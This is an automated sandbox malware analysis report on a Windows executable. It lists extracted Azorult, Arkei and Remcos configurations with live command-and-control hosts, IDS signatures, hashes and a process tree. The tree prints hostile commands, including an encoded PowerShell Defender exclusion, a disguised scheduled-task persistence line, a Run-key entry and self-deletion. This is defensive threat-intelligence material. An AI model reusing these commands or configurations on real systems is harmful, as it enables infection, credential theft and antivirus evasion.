Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
28/05/2022, 14:11
Static task
static1
Behavioral task
behavioral1
Sample
0a7b32e75a01764ef5389a1d9e72ed63.exe
Resource
win7-20220414-en
General
-
Target
0a7b32e75a01764ef5389a1d9e72ed63.exe
-
Size
40KB
-
MD5
0a7b32e75a01764ef5389a1d9e72ed63
-
SHA1
871366f3573c3349e9dc7b67fef1ef575815c154
-
SHA256
34ba222ef969f09ecca5506cbada7c346469a96a6af0cdd21146d4435196deda
-
SHA512
f19a7d56a825b59d2841a4f10db940458d3255239e15bb9bbe1376e1fc47d4c97aef09d4e7ecd5a3a35fca44ec92edf60edd4a07ef1845d679c3bd4fc8fe43ba
Malware Config
Extracted
arkei
Default
Extracted
azorult
http://195.245.112.115/index.php
Extracted
remcos
05282022
nikahuve.ac.ug:6968
kalskala.ac.ug:6968
tuekisaa.ac.ug:6968
parthaha.ac.ug:6968
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
scxs.dat
-
keylog_flag
false
-
keylog_folder
forbas
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
cvxyttydfsgbghfgfhtd-SPVWAO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M15
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M15
-
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
-
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
pid Process 4824 Iioozcrscrdqdprjojgormars2.exe 2276 6ICxGqOO.exe 5012 qbTw45ig.exe 2584 4dARKu85.exe 4816 RcL99cNy.exe 2164 Iioozcrscrdqdprjojgormars2.exe 4016 6ICxGqOO.exe 4608 6ICxGqOO.exe 3740 6ICxGqOO.exe 3388 6ICxGqOO.exe 1476 6ICxGqOO.exe 1340 4dARKu85.exe 2852 azne.exe 1412 azne.exe 2460 azne.exe 3764 azne.exe 2824 oobeldr.exe 1332 oobeldr.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation azne.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 0a7b32e75a01764ef5389a1d9e72ed63.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation Iioozcrscrdqdprjojgormars2.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 0a7b32e75a01764ef5389a1d9e72ed63.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 6ICxGqOO.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation qbTw45ig.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation RcL99cNy.exe Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation Iioozcrscrdqdprjojgormars2.exe -
Loads dropped DLL 9 IoCs
pid Process 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 1476 6ICxGqOO.exe 1476 6ICxGqOO.exe 1476 6ICxGqOO.exe 1476 6ICxGqOO.exe 2164 Iioozcrscrdqdprjojgormars2.exe 2164 Iioozcrscrdqdprjojgormars2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhsza = "\"C:\\Users\\Admin\\AppData\\Roaming\\dllhsza.exe\"" qbTw45ig.exe Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rcholaza = "\"C:\\Users\\Admin\\AppData\\Roaming\\rcholaza.exe\"" RcL99cNy.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 4060 set thread context of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4824 set thread context of 2164 4824 Iioozcrscrdqdprjojgormars2.exe 110 PID 2276 set thread context of 1476 2276 6ICxGqOO.exe 115 PID 2584 set thread context of 1340 2584 4dARKu85.exe 120 PID 4816 set thread context of 4240 4816 RcL99cNy.exe 133 PID 2852 set thread context of 3764 2852 azne.exe 136 PID 2824 set thread context of 1332 2824 oobeldr.exe 138 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6ICxGqOO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6ICxGqOO.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Iioozcrscrdqdprjojgormars2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Iioozcrscrdqdprjojgormars2.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1688 schtasks.exe 1884 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 4336 timeout.exe 2192 timeout.exe 2728 timeout.exe 2384 timeout.exe 3984 timeout.exe 2712 timeout.exe 3704 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 4824 Iioozcrscrdqdprjojgormars2.exe 4824 Iioozcrscrdqdprjojgormars2.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 2276 6ICxGqOO.exe 3500 powershell.exe 3676 powershell.exe 3676 powershell.exe 3500 powershell.exe 1476 6ICxGqOO.exe 1476 6ICxGqOO.exe 5012 qbTw45ig.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 4816 RcL99cNy.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2852 azne.exe 2684 Explorer.EXE 2684 Explorer.EXE 2684 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2684 Explorer.EXE -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2584 4dARKu85.exe 2824 oobeldr.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe Token: SeDebugPrivilege 4824 Iioozcrscrdqdprjojgormars2.exe Token: SeDebugPrivilege 2276 6ICxGqOO.exe Token: SeDebugPrivilege 4816 RcL99cNy.exe Token: SeDebugPrivilege 5012 qbTw45ig.exe Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeShutdownPrivilege 2684 Explorer.EXE Token: SeCreatePagefilePrivilege 2684 Explorer.EXE Token: SeShutdownPrivilege 2684 Explorer.EXE Token: SeCreatePagefilePrivilege 2684 Explorer.EXE Token: SeDebugPrivilege 2852 azne.exe Token: SeDebugPrivilege 2684 Explorer.EXE Token: SeShutdownPrivilege 2684 Explorer.EXE Token: SeCreatePagefilePrivilege 2684 Explorer.EXE Token: SeShutdownPrivilege 2684 Explorer.EXE Token: SeCreatePagefilePrivilege 2684 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2584 4dARKu85.exe 4240 MSBuild.exe 2824 oobeldr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4060 wrote to memory of 4672 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 79 PID 4060 wrote to memory of 4672 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 79 PID 4060 wrote to memory of 4672 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 79 PID 4672 wrote to memory of 4336 4672 cmd.exe 81 PID 4672 wrote to memory of 4336 4672 cmd.exe 81 PID 4672 wrote to memory of 4336 4672 cmd.exe 81 PID 4060 wrote to memory of 4824 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 88 PID 4060 wrote to memory of 4824 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 88 PID 4060 wrote to memory of 4824 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 88 PID 4060 wrote to memory of 3344 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 89 PID 4060 wrote to memory of 3344 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 89 PID 4060 wrote to memory of 3344 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 89 PID 4060 wrote to memory of 4764 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 90 PID 4060 wrote to memory of 4764 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 90 PID 4060 wrote to memory of 4764 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 90 PID 4060 wrote to memory of 2480 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 91 PID 4060 wrote to memory of 2480 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 91 PID 4060 wrote to memory of 2480 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 91 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4060 wrote to memory of 4564 4060 0a7b32e75a01764ef5389a1d9e72ed63.exe 92 PID 4824 wrote to memory of 3552 4824 Iioozcrscrdqdprjojgormars2.exe 93 PID 4824 wrote to memory of 3552 4824 Iioozcrscrdqdprjojgormars2.exe 93 PID 4824 wrote to memory of 3552 4824 Iioozcrscrdqdprjojgormars2.exe 93 PID 3552 wrote to memory of 2192 3552 cmd.exe 95 PID 3552 wrote to memory of 2192 3552 cmd.exe 95 PID 3552 wrote to memory of 2192 3552 cmd.exe 95 PID 4564 wrote to memory of 2276 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 97 PID 4564 wrote to memory of 2276 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 97 PID 4564 wrote to memory of 2276 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 97 PID 2276 wrote to memory of 4188 2276 6ICxGqOO.exe 98 PID 2276 wrote to memory of 4188 2276 6ICxGqOO.exe 98 PID 2276 wrote to memory of 4188 2276 6ICxGqOO.exe 98 PID 4564 wrote to memory of 5012 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 100 PID 4564 wrote to memory of 5012 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 100 PID 4188 wrote to memory of 2728 4188 cmd.exe 101 PID 4188 wrote to memory of 2728 4188 cmd.exe 101 PID 4188 wrote to memory of 2728 4188 cmd.exe 101 PID 4564 wrote to memory of 2584 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 102 PID 4564 wrote to memory of 2584 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 102 PID 4564 wrote to memory of 2584 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 102 PID 4564 wrote to memory of 4816 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 103 PID 4564 wrote to memory of 4816 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 103 PID 4564 wrote to memory of 4816 4564 0a7b32e75a01764ef5389a1d9e72ed63.exe 103 PID 5012 wrote to memory of 4200 5012 qbTw45ig.exe 105 PID 5012 wrote to memory of 4200 5012 qbTw45ig.exe 105 PID 4816 wrote to memory of 2636 4816 RcL99cNy.exe 106 PID 4816 wrote to memory of 2636 4816 RcL99cNy.exe 106 PID 4816 wrote to memory of 2636 4816 RcL99cNy.exe 106 PID 4200 wrote to memory of 2384 4200 cmd.exe 108 PID 4200 wrote to memory of 2384 4200 cmd.exe 108 PID 2636 wrote to memory of 3984 2636 cmd.exe 109 PID 2636 wrote to memory of 3984 2636 cmd.exe 109 PID 2636 wrote to memory of 3984 2636 cmd.exe 109 PID 4824 wrote to memory of 2164 4824 Iioozcrscrdqdprjojgormars2.exe 110 PID 4824 wrote to memory of 2164 4824 Iioozcrscrdqdprjojgormars2.exe 110 PID 4824 wrote to memory of 2164 4824 Iioozcrscrdqdprjojgormars2.exe 110 PID 4824 wrote to memory of 2164 4824 Iioozcrscrdqdprjojgormars2.exe 110
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe"C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe"2⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 203⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\SysWOW64\timeout.exetimeout /t 204⤵
- Delays execution with timeout.exe
PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe"C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 204⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\timeout.exetimeout /t 205⤵
- Delays execution with timeout.exe
PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exeC:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:2164 -
C:\Users\Admin\AppData\Roaming\azne.exe"C:\Users\Admin\AppData\Roaming\azne.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 206⤵PID:2428
-
C:\Windows\SysWOW64\timeout.exetimeout /t 207⤵
- Delays execution with timeout.exe
PID:3704
-
-
-
C:\Users\Admin\AppData\Roaming\azne.exeC:\Users\Admin\AppData\Roaming\azne.exe6⤵
- Executes dropped EXE
PID:1412
-
-
C:\Users\Admin\AppData\Roaming\azne.exeC:\Users\Admin\AppData\Roaming\azne.exe6⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\AppData\Roaming\azne.exeC:\Users\Admin\AppData\Roaming\azne.exe6⤵
- Executes dropped EXE
PID:3764
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe" & exit5⤵PID:3608
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:2712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exeC:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe3⤵PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exeC:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe3⤵PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exeC:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe3⤵PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exeC:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe"C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 205⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\timeout.exetimeout /t 206⤵
- Delays execution with timeout.exe
PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exeC:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe5⤵
- Executes dropped EXE
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exeC:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe5⤵
- Executes dropped EXE
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exeC:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe5⤵
- Executes dropped EXE
PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exeC:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe5⤵
- Executes dropped EXE
PID:3388
-
-
C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exeC:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\qbTw45ig.exe"C:\Users\Admin\AppData\Local\Temp\qbTw45ig.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 205⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\system32\timeout.exetimeout /t 206⤵
- Delays execution with timeout.exe
PID:2384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"5⤵
- Executes dropped EXE
PID:1340 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"6⤵
- Creates scheduled task(s)
PID:1688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RcL99cNy.exe"C:\Users\Admin\AppData\Local\Temp\RcL99cNy.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 205⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\timeout.exetimeout /t 206⤵
- Delays execution with timeout.exe
PID:3984
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe5⤵PID:1000
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe5⤵PID:2644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:4240
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2824 -
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"2⤵
- Executes dropped EXE
PID:1332 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"3⤵
- Creates scheduled task(s)
PID:1884
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
Filesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
Filesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
Filesize
18KB
MD5a73b3a17c3625e54ec568e89ba6193dc
SHA10ff0bd8a672282767b4816d8f0c3b63e3ba9f482
SHA256735e981513e499ee8921ed15b0f95d82ed6e1a9535b3cf53d216a8594ad0be9e
SHA512a771bd2a44124e3ac026b99603f8f9be30b207d66678c3aeb008fa529db20bea865a899a66e8fcb362528cd2abd8031a6825ebd15dabf75ea37d894f894851b9
-
Filesize
396KB
MD5e387adfe154d03ee693acbaf9837ef29
SHA1bccf1709659919e80db36f07269ce04767324572
SHA256bd494dfedf054b84755ca974106405ae6ed49555f931e542b18d92fb1caa567f
SHA512a0c031451d26bd77744c1c3c6e01d262282ad26d8211e0e68c5ed5b2c8a4b472fdd69d886f9a8f9fa52a9f03d6ac877b92fee4a9e075522af86c484fa1144c34
-
Filesize
396KB
MD5e387adfe154d03ee693acbaf9837ef29
SHA1bccf1709659919e80db36f07269ce04767324572
SHA256bd494dfedf054b84755ca974106405ae6ed49555f931e542b18d92fb1caa567f
SHA512a0c031451d26bd77744c1c3c6e01d262282ad26d8211e0e68c5ed5b2c8a4b472fdd69d886f9a8f9fa52a9f03d6ac877b92fee4a9e075522af86c484fa1144c34
-
Filesize
396KB
MD5e387adfe154d03ee693acbaf9837ef29
SHA1bccf1709659919e80db36f07269ce04767324572
SHA256bd494dfedf054b84755ca974106405ae6ed49555f931e542b18d92fb1caa567f
